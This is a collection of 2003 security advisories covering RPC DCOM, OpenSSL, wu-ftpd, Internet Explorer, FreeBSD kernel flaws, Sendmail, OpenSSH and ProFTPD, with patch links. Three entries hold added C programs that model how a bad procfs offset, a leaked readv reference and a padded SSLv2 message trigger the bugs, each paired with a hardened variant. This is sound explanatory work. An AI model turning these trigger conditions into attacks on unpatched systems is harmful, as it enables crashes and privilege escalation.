http://www.microsoft.com/technet/security/winoct03.asp 




Bad news on RPC DCOM vulnerability

2003-10-13

Risk level: Critical

Type: Buffer overflow

Source of info: ZARAZA

Impact

A universal exploit for MS03-039 exists in the wild and is still effective.

As reported by the exploit's author (and confirmed by 3ARA3A), Windows XP SP1
with all security fixes installed is still vulnerable to a variant of the
same bug. Windows 2000/2003 were not tested. For now only a DoS exploit
exists, but code execution is probably possible. 

Overview

Technical details have been sent to Microsoft and are awaiting confirmation.
This is a highly critical vulnerability - users MUST block the vulnerable ports!

As with the prior RPC vulnerability (MS03-039), these attacks can occur
on TCP ports 135, 139, 445 and 593, and on UDP ports 135, 137, 138 and 445.





New openssl095 packages fix denial of service

2003-10-11

Risk level: high

Type: many types

Source of info: Debian Security Team

Impact

Steve Henson of the OpenSSL core team identified and prepared fixes
for a number of vulnerabilities in the OpenSSL ASN1 code that were
discovered after running a test suite by British National
Infrastructure Security Coordination Centre (NISCC).

Overview

A bug in OpenSSL's SSL/TLS protocol code was also identified which causes
OpenSSL to parse a client certificate from an SSL/TLS client when it
should reject it as a protocol error.

The Common Vulnerabilities and Exposures project identifies the
following problems:

CAN-2003-0543:

   Integer overflow in OpenSSL that allows remote attackers to cause a
   denial of service (crash) via an SSL client certificate with
   certain ASN.1 tag values.

CAN-2003-0544:

   OpenSSL does not properly track the number of characters in certain
   ASN.1 inputs, which allows remote attackers to cause a denial of
   service (crash) via an SSL client certificate that causes OpenSSL
   to read past the end of a buffer when the long form is used.

CAN-2003-0545:

   Double-free vulnerability allows remote attackers to cause a denial
   of service (crash) and possibly execute arbitrary code via an SSL
   client certificate with a certain invalid ASN.1 encoding.  This bug
   was only present in OpenSSL 0.9.7 and is listed here only for
   reference.

Patches

The latest versions can be downloaded from:
http://www.openssl.org/source/

Patches for debian:
 Source archives:
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.dsc
      Size/MD5 checksum:      631 ba6e597ab2db2984aef6c2a765ac29c0
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.diff.gz
      Size/MD5 checksum:    38851 6b197111a7068a7ea29ef55176771d89
    http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz
      Size/MD5 checksum:  1892089 99d22f1d4d23ff8b927f94a9df3997b4

  Alpha architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_alpha.deb
      Size/MD5 checksum:   497152 fe3d6854382f8dbe2d10f3f5700dd8f6

  ARM architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_arm.deb
      Size/MD5 checksum:   402498 551b79fbb80903f174d6edeffd9869df

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_i386.deb
      Size/MD5 checksum:   399752 2a856ac6b45d41beb0bf78880b236966

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_m68k.deb
      Size/MD5 checksum:   376738 980e428e9b913672d939ebe77c18cd6d

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mips.deb
      Size/MD5 checksum:   412624 b8c7cc0b4dcbf1cf03480b93c78cd610

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mipsel.deb
      Size/MD5 checksum:   407388 de02385580cf33c344c1ffadcf8aed88

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_powerpc.deb
      Size/MD5 checksum:   425452 c3d04af89c64e6e9f0175e6cd4997058

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_sparc.deb
      Size/MD5 checksum:   412196 ae1181c2873a304c583800459da53e5a



Wu-ftpd fb_realpath() off-by-one bug

2003-10-04

Risk level: high

Type: Buffer overflow

Source of info: SCO Security Team

Impact

	The Wu-ftpd FTP server contains a remotely exploitable off-by-one bug. A
	local or remote attacker could exploit this vulnerability to gain
	root privileges on a vulnerable system.

Overview

Vulnerable Supported Versions

	System				Package
	----------------------------------------------------------------------
	OpenLinux 3.1.1 Server		prior to wu-ftpd-2.6.1-14.i386.rpm
	OpenLinux 3.1.1 Workstation	prior to wu-ftpd-2.6.1-14.i386.rpm

Patches

OpenLinux 3.1.1 Workstation
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-024.0/RPMS
  Packages
    05b6a116c8160033f16b7c52611c1f86  wu-ftpd-2.6.1-14.i386.rpm
  Source Package Location
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2003-024.0/SRPMS
  Source Packages
    b53bca2a2dcce72aa0f15c661961d2b6  wu-ftpd-2.6.1-14.src.rpm

OpenLinux 3.1.1 Server
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-024.0/RPMS
  Packages
    5dfb4811abe8ccf46d8c523b13ef34d1  wu-ftpd-2.6.1-14.i386.rpm
  Source Package Location
  ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2003-024.0/SRPMS
  Source Packages
    13d7a9857c9151477e20e49f25d48169  wu-ftpd-2.6.1-14.src.rpm



Cumulative Patch for Internet Explorer

2003-10-03

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 6.0. 
In addition, it eliminates newly discovered vulnerabilities.

Overview

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server in a 
popup window. It could be possible for an attacker who exploited this
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the attacker
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML-based e-mail that would attempt to 
exploit this vulnerability.

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server during 
XML data binding. It could be possible for an attacker who exploited 
this vulnerability to run arbitrary code on a user's system. If a 
user visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user action.
An attacker could also craft an HTML-based e-mail that would attempt 
to exploit this vulnerability.

A change has been made to the method by which Internet Explorer 
handles Dynamic HTML (DHTML) Behaviors in the Internet Explorer 
Restricted Zone.  It could be possible for an attacker exploiting a 
separate vulnerability (such as one of the two vulnerabilities 
discussed above) to cause Internet Explorer to run script code in the
security context of the Internet Zone. In addition, an attacker could
use Windows Media Player's (WMP) ability to open URL's to construct 
an attack. An attacker could also craft an HTML-based e-mail that 
could attempt to exploit this behavior.

To exploit these flaws, the attacker would have to create a specially
formed HTML-based e-mail and send it to the user. Alternatively an 
attacker would have to host a malicious Web site that contained a Web
page designed to exploit these vulnerabilities. The attacker would 
then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004, MS03-015,  MS03-020, and MS03-032, this 
cumulative patch will cause window.showHelp( ) to cease to function 
if you have not applied the HTML Help update. If you have installed 
the updated HTML Help control from Knowledge Base article 811630, you
will still be able to use HTML Help functionality after applying this
patch. 

In addition to applying this security patch it is recommended that 
users also install the Windows Media Player update referenced in 
Knowledge Base Article 828026.  This update is available from Windows
Update as well as the Microsoft Download Center for all supported 
versions of Windows Media Player. While not a security patch, this 
update contains a change to the behavior of Windows Media Player's 
ability to launch URL's to help protect against DHTML behavior based 
attacks.  Specifically, it restricts Windows Media Player's ability 
to launch URL's in the local computer zone from other zones.

  By default, Internet Explorer on Windows Server 2003 runs in Enhanced Security Configuration. This default configuration of Internet
Explorer blocks automatic exploitation of this attack. If Internet Explorer Enhanced Security Configuration has been disabled, the protections 
put in place that prevent this vulnerability from being automatically exploited would be removed. 

 In the Web-based attack scenario, the attacker would have to host a 
Web site that contained a Web page used to exploit this 
vulnerability.  An attacker would have no way to force a user to 
visit a malicious Web Site. Instead, the attacker would need to lure 
them there, typically by getting them to click a link that would take
them to the attacker's site.

 Exploiting the vulnerability would allow the attacker only the same 
privileges as the user. Users whose accounts are configured to have 
few privileges on the system would be at less risk than ones who 
operate with administrative privileges. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
http://www.microsoft.com/security/security_bulletins/MS03-040.asp



Integer Overflow in FreeBSD Kernel [uio]

2003-10-02

Risk level: Serious

Type: DoS

Source of info: Pine Digital Security

Impact

        Local users on a machine with procfs enabled could exploit this
        vulnerability to cause a system panic (denial of service) or
        potentially elevate their privileges.

Overview

        The process file system, or procfs, implements a view of the system
        process table inside the file system.  It is normally mounted on
        /proc, and is required for the complete operation of programs
        such as ps(1) and w(1).

        In several places in the procfs implementation the "uio" offset
        parameter is used without proper validation; the following
        code fragment illustrates this:

        /usr/src/sys/miscfs/procfs/procfs_regs.c (edited, lines 59-84):

                struct reg r; char *kv; int kl;
                ..

                kl = sizeof(r);
                kv = (char *) &r;
                ...

                /* the user-influenced offset is applied before it is checked */
                kv += uio->uio_offset;
                kl -= uio->uio_offset;

                /* clamp to the caller's buffer size ... */
                if (kl > uio->uio_resid) kl = uio->uio_resid;

                ...

                /* ... so this check sees the clamped value, not the
                 * result of the subtraction above */
                if (kl < 0) error = EINVAL;

                ...

                if (error == 0) error = uiomove(kv, kl, uio);

        As the fragment shows, uio->uio_offset is added to kv and
        subtracted from kl before it is validated in any way, and since it
        is under (indirect) control of the user it is possible to disclose
        large amounts of kernel memory by specifying an extremely large or
        negative value: a negative offset moves kv before r and makes kl
        larger than sizeof(r), the clamp to uio_resid then leaves kl
        positive, so the later "kl < 0" check never fires; an offset too
        large for an int has the same effect through truncation of kl.
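The following C program is an added example, not code from the FreeBSD tree or from Pine Digital Security: it re-implements the quoted arithmetic in user space (the names regs_read_vulnerable, regs_read_fixed, copy_req and the 80-byte stand-in for struct reg are invented) so that the effect of a negative and of a very large uio_offset can be observed without a kernel. Nothing in it touches memory out of bounds; each function only reports the range uiomove() would have been asked to copy. The corrected variant is this editor's assumption about the shape of a fix, not the patch FreeBSD committed.

```c
/* Added example, not FreeBSD code: user-space model of the procfs_regs.c
 * arithmetic quoted above.  Nothing here touches real memory out of bounds;
 * the functions only report what uiomove() would have been asked to copy. */
#include <stdio.h>
#include <errno.h>

struct reg { char regs[80]; };            /* stand-in for the real struct reg */

/* The copy request the quoted code would hand to uiomove(): a start offset
 * relative to &r, a length, and whether that range lies inside r. */
struct copy_req {
    int       error;                      /* 0 or EINVAL */
    long long start;                      /* kv - (char *)&r */
    int       len;                        /* kl */
    int       in_bounds;
};

static struct copy_req finish(int error, long long start, int len)
{
    struct copy_req c = { error, start, len, 0 };
    if (error == 0)
        c.in_bounds = start >= 0 && len >= 0 &&
                      start + len <= (long long)sizeof(struct reg);
    return c;
}

/* The arithmetic as quoted: the 64-bit off_t is applied to kv and to the
 * int kl first, the result is clamped to uio_resid, and only then is the
 * sign of kl checked. */
struct copy_req regs_read_vulnerable(long long uio_offset, int uio_resid)
{
    int       kl = sizeof(struct reg);
    long long kv = 0;                     /* (char *)&r, kept as an offset */

    kv += uio_offset;
    kl -= uio_offset;                     /* 64-bit result truncated to int */

    if (kl > uio_resid) kl = uio_resid;   /* an oversized kl becomes "resid" */
    if (kl < 0) return finish(EINVAL, kv, kl);

    return finish(0, kv, kl);             /* uiomove(kv, kl, uio) */
}

/* Hardened form (an assumption about the shape of a fix, not the patch
 * FreeBSD committed): validate the offset before any arithmetic uses it,
 * so kv and kl can only ever describe a sub-range of r. */
struct copy_req regs_read_fixed(long long uio_offset, int uio_resid)
{
    int       kl = sizeof(struct reg);
    long long kv = 0;

    if (uio_offset < 0 || uio_offset > (long long)sizeof(struct reg) || uio_resid < 0)
        return finish(EINVAL, 0, 0);

    kv += uio_offset;
    kl -= (int)uio_offset;                /* now in [0, sizeof(r)] */
    if (kl > uio_resid) kl = uio_resid;

    return finish(0, kv, kl);
}

static void show(const char *label, struct copy_req c)
{
    printf("%-18s error=%d start=%lld len=%d in_bounds=%d\n",
           label, c.error, c.start, c.len, c.in_bounds);
}

int main(void)
{
    show("negative offset", regs_read_vulnerable(-4096, 4096));       /* 4096 bytes before r */
    show("offset > INT_MAX", regs_read_vulnerable(0x100000000LL + 16, 4096)); /* kl wraps to 64 */
    show("fixed, negative", regs_read_fixed(-4096, 4096));            /* EINVAL */
    show("fixed, legal", regs_read_fixed(16, 4096));                  /* last 64 bytes of r */
    return 0;
}
```

The two vulnerable calls show the two ways in: a negative offset passes because the clamp to uio_resid runs before the sign check, and an offset above INT_MAX passes because the subtraction is truncated into the int kl and comes out small and positive.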

Exploitability

        Local users can cause an effective denial of service by attempting
        to read from non resident kernel memory and thus generating
        a system panic.

        Local users could also potentially elevate their privileges by
        reading from terminal input buffers and thus stealing other
        users passwords.

Addendum

        The FreeBSD security officer team spotted a similar vulnerability
        in the pseudofs implementation. Pine Digital Security recommends
        upgrading even if you do not use procfs.

Patches

 The FreeBSD Project has updated their CVS repositories.



Integer Overflow in FreeBSD Kernel [fhold]

2003-10-02

Risk level: high

Type: DoS

Source of info: Pine Digital Security

Impact

Local users can exploit this vulnerability to cause a system panic (denial of service) or potentially escalate their privileges.


Overview

While performing an audit for a customer, Pine Digital Security
encountered an integer overflow condition which could lead to
a denial of service attack or privilege escalation.


This vulnerability is similar to the fpathconf vulnerability:
 http://www.pine.nl/press/pine-cert-20030101.txt

        Inside the readv(2) system call we spotted a condition where a
        call to fdrop() is missing. When issuing a readv(2) call with
        an oversized iovcnt parameter the function returns without
        releasing the outstanding file reference.

        Due to the missing fdrop() call inside the readv(2) system call
        it is possible to overflow the reference counter of the file
        structure (int f_count).

        Quoting PINE-CERT-20030101:

         Inside the FreeBSD kernel each file (socket, device or regular
         file) opened is represented by a file structure (sys/file.h).

         Amongst other members this structure holds a reference counter
         (int f_count). This reference counter is increased by the fhold()
         function and decreased by the fdrop() function. (both in sys/file.h)

         For example, when a file is open(2)ed or dup(2)ed the reference
         counter is increased and when the file is close(2)ed again the
         reference counter is decreased. Once the reference counter reaches
         zero, the file structure itself is deallocated.

         Most system calls which perform (blocking) operations on a file
         will issue a fhold() call to prevent the file from being closed
         in the middle of an operation. Once the operation is finished the
         (extra) reference will be released again by issuing a fdrop() call.
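The following C program is an added example, not FreeBSD code: it models in user space the fhold()/fdrop() discipline quoted above and a readv() that returns on the iovcnt check without the matching fdrop(), beside a corrected version. The file structure, UIO_MAXIOV value and helper functions (count_after, close_frees_file) are invented for the demonstration; the counter is advanced with unsigned arithmetic only so that the wrap is well defined in this model, where the kernel's plain f_count++ wraps the same way in practice.

```c
/* Added example, not FreeBSD code: user-space model of the fhold()/fdrop()
 * discipline quoted above and of a readv() that forgets the fdrop() on one
 * error path.  Names follow sys/file.h; the functions themselves are invented. */
#include <stdio.h>
#include <limits.h>
#include <errno.h>

#define UIO_MAXIOV 1024                   /* iovcnt limit for readv/writev */

struct file {
    int f_count;                          /* reference counter, as in sys/file.h */
    int freed;                            /* set when the last reference is dropped */
};

/* fhold(): take a reference.  The kernel's version is a plain f_count++;
 * unsigned arithmetic is used here only so the wrap is well defined in
 * this model instead of undefined behaviour. */
static void fhold(struct file *fp)
{
    fp->f_count = (int)((unsigned)fp->f_count + 1u);
}

/* fdrop(): release a reference; at zero (or below) the structure is freed. */
static void fdrop(struct file *fp)
{
    fp->f_count = (int)((unsigned)fp->f_count - 1u);
    if (fp->f_count <= 0)
        fp->freed = 1;
}

/* readv() as described: the file is held for the duration of the call,
 * but the iovcnt check returns without releasing the reference. */
int readv_vulnerable(struct file *fp, unsigned int iovcnt)
{
    fhold(fp);
    if (iovcnt > UIO_MAXIOV)
        return EINVAL;                    /* BUG: missing fdrop(fp) */
    /* ... copy in the iovecs and perform the read ... */
    fdrop(fp);
    return 0;
}

/* Corrected form: every exit path pairs the fhold() with an fdrop(). */
int readv_fixed(struct file *fp, unsigned int iovcnt)
{
    fhold(fp);
    if (iovcnt > UIO_MAXIOV) {
        fdrop(fp);
        return EINVAL;
    }
    /* ... */
    fdrop(fp);
    return 0;
}

/* Call readv_fn `calls` times with an oversized iovcnt on a file whose
 * counter starts at initial_count, and return the resulting f_count. */
int count_after(int (*readv_fn)(struct file *, unsigned int),
                int initial_count, long calls)
{
    struct file f = { initial_count, 0 };
    for (long i = 0; i < calls; i++)
        (void)readv_fn(&f, UIO_MAXIOV + 1);
    return f.f_count;
}

/* Leak `leaked_calls` references through readv_vulnerable(), then let the
 * process close(2) the descriptor once.  Returns 1 if that close freed the
 * structure.  With the counter wrapped negative the free happens while
 * every leaked reference is still outstanding: a use after free. */
int close_frees_file(int initial_count, long leaked_calls)
{
    struct file f = { initial_count, 0 };
    for (long i = 0; i < leaked_calls; i++)
        (void)readv_vulnerable(&f, UIO_MAXIOV + 1);
    fdrop(&f);                            /* the close(2) */
    return f.freed;
}

int main(void)
{
    printf("5 bad readv() calls, vulnerable: f_count %d\n", count_after(readv_vulnerable, 1, 5));
    printf("5 bad readv() calls, fixed:      f_count %d\n", count_after(readv_fixed, 1, 5));
    printf("from INT_MAX, one more leak:     f_count %d\n", count_after(readv_vulnerable, INT_MAX, 1));
    printf("close() after wrap frees file:   %d\n", close_frees_file(INT_MAX, 2));
    return 0;
}
```

Starting the counter near INT_MAX stands in for the 2^31 leaking calls a real attacker would loop through; the point is the last step, where an ordinary close() frees a structure that every leaked reference still points at.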

Exploitability

        On most vulnerable systems this vulnerability can be reliably
        exploited by local users to escalate their privileges or cause
        an effective denial of service attack.

        Refer to PINE-CERT-20030101 for more information.

Patches

The FreeBSD Project has updated their CVS repositories.



New OpenSSL remote vulnerability (issue date 2003/10/02) - RedHat

2003-10-02

Risk level: medium

Type: Remote DoS

Source of info: CERT

Impact

Mr. Hornik discovered a remote vulnerability in the OpenSSL package provided
by RedHat. Because of the nature of this bug some other vendors may be
vulnerable too. The vulnerability is in the SSLv2 server code and allows
killing a remote process that uses the OpenSSL library as an SSL server,
resulting in DoS.

The vulnerability is different from the one found in the SSLv2 OpenSSL server
announced on 2002/07/30.


Overview

By constructing a special SSLv2 CLIENT_MASTER_KEY message the following
execution path can be obtained (source lines refer to
openssl-0.9.6b-32.7.src.rpm from RH 7.3).

When:
i)  the negotiated cipher is an export cipher, for example EXP-RC4-MD5, and
ii) the length of the clear key data is increased, for example by 64,

then this execution path happens:
1. at ssl/s2_srvr.c:419 the condition is_export && (s->s2->tmp.clear+i !=
   EVP_CIPHER_key_length(c)) becomes true because of i) and ii);
2. at ssl/s2_srvr.c:424 i is "fixed", but tmp.clear stays unchanged;
3. at ssl/s2_srvr.c:450, because is_export is true, the integer variable i
   is increased by the clear length, which ii) made large enough;
4. at ssl/s2_srvr.c:451 die() aborts the process, leading to DoS.
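The following C program is an added example, not OpenSSL's s2_srvr.c: it models the four-step path above with the three lengths involved (clear_len, secret_len, key_len) and a die() macro that reports instead of aborting, so the outcome of the padded message can be observed. Function names and constants are invented; for EXP-RC4-MD5 the 16-byte key consists of 11 clear bytes carried in the message and 5 secret bytes recovered by RSA decryption. The hardened variant is an assumption in the spirit of the 0.9.6f change described below, not the actual OpenSSL patch.

```c
/* Added example, not OpenSSL's s2_srvr.c: a model of the four-step path
 * above, reduced to the lengths involved.  Names and constants are invented;
 * for EXP-RC4-MD5 the 16-byte key is split into 11 clear bytes carried in
 * the message and 5 secret bytes recovered by RSA decryption. */
#include <stdio.h>

enum { EXPORT_KEY_LEN = 16, EXPORT_SECRET_LEN = 5 };

enum mk_result { MK_OK = 0, MK_REJECTED = -1, MK_DIED = -2 };

/* OpenSSL 0.9.6's die() is an internal assertion that abort()s the whole
 * server process.  It is modelled as a return so the outcome can be seen. */
#define die(cond) do { if (!(cond)) return MK_DIED; } while (0)

/* Vulnerable path.  clear_len is the CLEAR-KEY-LENGTH field chosen by the
 * client, secret_len the length obtained by decrypting ENCRYPTED-KEY-DATA,
 * key_len the cipher's key length.  Only the export branch is modelled. */
int client_master_key_vulnerable(int is_export, int clear_len,
                                 int secret_len, int key_len)
{
    int i = secret_len;

    if (!is_export)
        return i == key_len ? MK_OK : MK_REJECTED;

    if (clear_len + i != key_len)        /* step 1: lengths disagree */
        i = EXPORT_SECRET_LEN;           /* step 2: i "fixed", clear_len not */

    i += clear_len;                      /* step 3: client's clear_len added back */
    die(i == key_len);                   /* step 4: abort() on mismatch */
    return MK_OK;
}

/* Hardened path (an assumption in the spirit of the 0.9.6f change, not the
 * actual OpenSSL patch): a malformed message is a protocol error returned
 * to the caller, never an assertion failure. */
int client_master_key_fixed(int is_export, int clear_len,
                            int secret_len, int key_len)
{
    if (!is_export)
        return secret_len == key_len ? MK_OK : MK_REJECTED;

    if (clear_len < 0 || clear_len + EXPORT_SECRET_LEN != key_len)
        return MK_REJECTED;              /* client-chosen length is wrong */
    if (secret_len != EXPORT_SECRET_LEN)
        return MK_REJECTED;              /* bad decrypt */
    return MK_OK;
}

int main(void)
{
    /* well-formed: 11 clear + 5 secret = 16 */
    printf("valid, vulnerable:  %d\n",
           client_master_key_vulnerable(1, 11, 5, EXPORT_KEY_LEN));
    /* clear length increased by 64, as in the advisory */
    printf("padded, vulnerable: %d (MK_DIED: the process would abort)\n",
           client_master_key_vulnerable(1, 11 + 64, 5, EXPORT_KEY_LEN));
    printf("padded, fixed:      %d (MK_REJECTED)\n",
           client_master_key_fixed(1, 11 + 64, 5, EXPORT_KEY_LEN));
    return 0;
}
```

The general lesson is the one the advisory draws: an internal assertion on a value the peer controls turns a malformed message into a process crash, so a server-side sanity check of network input must return a protocol error rather than die().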


Who is affected?
----------------

Affected are all RedHat distributions up to and including version 8.0.
RedHat published the patch on 2003/09/30 silently, without issuing a warning
about the existence of the vulnerability. RedHat announced the patch in its
advisory RHSA-2003:291-11.

openssl.org sources starting with version 0.9.6f, and distribution
packages based on those versions, are not vulnerable, because OpenSSL
from 0.9.6f on avoids the die() call because of its potential risk.


Recommendations
----------------

We recommend upgrading the openssl package to the version issued on
2003/09/30 or later in all RedHat distributions up to 8.0. Until the
new version is installed we recommend disabling SSLv2 wherever possible.
(In Apache + mod_ssl, for example, it is enabled by default and can be
disabled; please refer to the mod_ssl documentation.)





Multiple OpenSSH/OpenSSL Vulnerabilities on Irix

2003-09-30

Risk level: high

Type: many types

Source of info: SGI Security Team

Impact

It has been reported that the OpenSSH/OpenSSL that ships with IRIX has several
security vulnerabilities that may lead to root access on vulnerable systems.

Overview

1) buffer.c vulnerability fixed in OpenSSH 3.7 (CAN-2003-0693)
    http://marc.theaimsgroup.com/?l=bugtraq&m=106373247528528&w=2
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0693

2) More buffer management vulnerabilities fixed in OpenSSH 3.7.1 (CAN-2003-0695)
    http://www.openssh.com/txt/buffer.adv
    http://www.cert.org/advisories/CA-2003-24.html
    http://www.kb.cert.org/vuls/id/333628
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0695

3) Openwall's "memory" security fixes to OpenSSH 3.7.1 (CAN-2003-0682)
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0682

4) ssh-keysign core dumps on IRIX (SGI BUG 899663)

5) Multiple OpenSSL vulnerabilities in ASN.1 parsing
    http://www.openssl.org/news/secadv_20030930.txt
    http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545

Please note that the OpenSSH which ships with IRIX is NOT vulnerable
to the two recent PAM vulnerabilities found in portable OpenSSH 3.7/3.7.1:
    http://www.openssh.com/txt/sshpam.adv
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0786
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0787

    * However, the Freeware OpenSSH from http://freeware.sgi.com/
    is PAM enabled and possibly vulnerable to these issues.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures
be implemented on ALL vulnerable SGI systems.

These vulnerabilities have been corrected in future releases of OpenSSH
and OpenSSL for IRIX.


Patches

This OpenSSH 3.6.1p2 package has the fixes backported from OpenSSH 3.7.1p2:
ftp://patches.sgi.com/support/free/security/patches/6.5.22/openssh.tardist

This OpenSSL 0.9.7b package has the fixes backported from OpenSSL 0.9.7c:
ftp://patches.sgi.com/support/free/security/patches/6.5.22/openssl.tardist



Sendmail prescan() vulnerability

2003-09-29

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

It has been reported that under certain conditions a vulnerability in
sendmail could allow a remote attacker to execute arbitrary code with
the privileges of the sendmail daemon, typically root. This affects
all versions of sendmail including the latest version, 8.12.9.

Overview

This vulnerability is resolved in Sendmail 8.12.10. Sendmail has also released a patch that can be applied to Sendmail 8.9.x through 8.12.9. Information about specific vendors is available in Appendix A. and in the Systems Affected section of VU#784980.

Sendmail 8.12.10 is designed to correct malformed messages that are transferred by the server. This should help protect other vulnerable sendmail servers.

Patches

http://support.sgi.com/
ftp://patches.sgi.com



New PHP 4.3.3 released.

2003-09-25

Risk level: none

Type: none

Source of info: php.net

Impact

The PHP developers are proud to announce the immediate availability of PHP 4.3.3. This release contains a large number of bug fixes and we strongly recommend that all users of PHP upgrade to this version. 

Overview

After a lengthy QA process, PHP 4.3.3 is finally out! This maintenance release solves a fair number of bugs found in prior PHP versions and addresses several security issues. All users are strongly advised to upgrade to 4.3.3 as soon as possible.

Bugfix release

PHP 4.3.3 contains, among others, the following important fixes, additions and improvements:

    * Improved the engine to use POSIX/socket IO where feasible.
    * Fixed several potentially hazardous integer and buffer overflows.
    * Fixed corruption of multibyte character including 0x5c as second byte in multipart/form-data.
    * Fixed each() to be binary safe for keys.
    * Major improvements to the NSAPI SAPI.
    * Improvements to the IMAP extension.
    * Improvements to the InterBase extension.
    * Added DBA handler 'inifile' to support ini files.
    * Added long options into CLI & CGI (e.g. --version).
    * Added a new parameter to preg_match*() that can be used to specify the starting offset in the subject string to match from.
    * Upgraded the bundled Expat library to version 1.95.6
    * Upgraded the bundled PCRE library to version 4.3
    * Upgraded the bundled GD library to version GD 2.0.15
    * Over 100 various bug fixes!



Denial of service due to ARP resource starvation (FreeBSD)

2003-09-24

Risk level: medium

Type: DoS

Source of info: FreeBSD Project Team

Impact

Under certain circumstances, it is possible for an attacker to flood a
FreeBSD system with spoofed ARP requests, causing resource starvation
which eventually results in a system panic.  (The critical condition
is that a route exists for the apparent source of the ARP request.
This is always the case if the system has a default route configured
for that protocol family.)

Overview

The Address Resolution Protocol (ARP) is fundamental to the operation
of IP with a variety of network technologies, such as Ethernet and
WLAN.  It is used to map IP addresses to MAC addresses, which enables
hosts on a local network segment to communicate with each other
directly.  These mappings are stored in the system's ARP cache.

FreeBSD's ARP cache is implemented within the kernel routing table as
a set of routes for the address family in use that have the LLINFO
flag set.  This is most commonly AF_INET (for IPv4).  Normally,
when a FreeBSD system receives an ARP request for a network address
configured on one of its interfaces from a system on a local network,
it adds a reciprocal ARP entry to the cache for the system from where
the request originated.  Expiry timers are used to purge unused
entries from the ARP cache.  A reference count is maintained for each
ARP entry.  If the reciprocal ARP entry is not in use by an upper
layer protocol, the reference count will be zero.

If a large number of ARP requests with different network protocol
addresses are sent in a small space of time, resource starvation can
result, as the arplookup() function does not delete unnecessary ARP
entries cached as the result of responding to an ARP request.

NOTE WELL: Other BSD-derived systems may also be affected, as the
affected code dates well back to the CSRG branches.

An attacker on the local network may be able to cause the system to
hang or crash.  The attacker must have physical access to the shared
network medium.  In the case of a wireless network obtaining this
access may be trivial.  Networks where proxy ARP is used to direct
traffic between LANs may be particularly vulnerable to the attack,
as the spoofed ARP requests could be bounced through to the target
via routers implementing proxy ARP.

Because the attack operates at Layer 2, the use of strong encryption
technologies such as IPsec cannot protect a system against the attack.

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:14/arp.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:14/arp.patch.asc



Multiple PAM vulnerabilities in portable OpenSSH

2003-09-23

Risk level: high

Type: many types

Source of info: OpenBSD Group

Impact

Portable OpenSSH versions 3.7p1 and 3.7.1p1 contain multiple
vulnerabilities in the new PAM code. At least one of these bugs
is remotely exploitable (under a non-standard configuration,
with privsep disabled).

Overview

The OpenBSD releases of OpenSSH do not contain this code and are not vulnerable. Older versions of portable OpenSSH are not vulnerable.

Upgrade to Portable OpenSSH 3.7.1p2 or disable PAM support ("UsePam no" in sshd_config).

Due to complexity, inconsistencies in the specification and differences between vendors' PAM implementations we recommend that PAM be left disabled in sshd_config unless there is a need for its use. Sites only using public key or simple password authentication usually have little need to enable PAM support.



ProFTPD ASCII File Remote Compromise Vulnerability

2003-09-23

Risk level: high

Type: Buffer overflow

Source of info: ISS X-Force

Impact

ISS X-Force has discovered a flaw in the ProFTPD Unix FTP server. ProFTPD
is a highly configurable FTP (File Transfer Protocol) server for Unix
that allows for per-directory access restrictions, easy configuration of
virtual FTP servers, and support for multiple authentication mechanisms.
A flaw exists in the ProFTPD component that handles incoming ASCII file
transfers.

Overview

An attacker capable of uploading files to the vulnerable system can
trigger a buffer overflow and execute arbitrary code to gain complete
control of the system. Attackers may use this vulnerability to destroy,
steal, or manipulate data on vulnerable FTP sites.

Affected Versions:

ProFTPD 1.2.7
ProFTPD 1.2.8
ProFTPD 1.2.8rc1
ProFTPD 1.2.8rc2
ProFTPD 1.2.9rc1
ProFTPD 1.2.9rc2
Versions previous to version 1.2.7 may also be vulnerable.




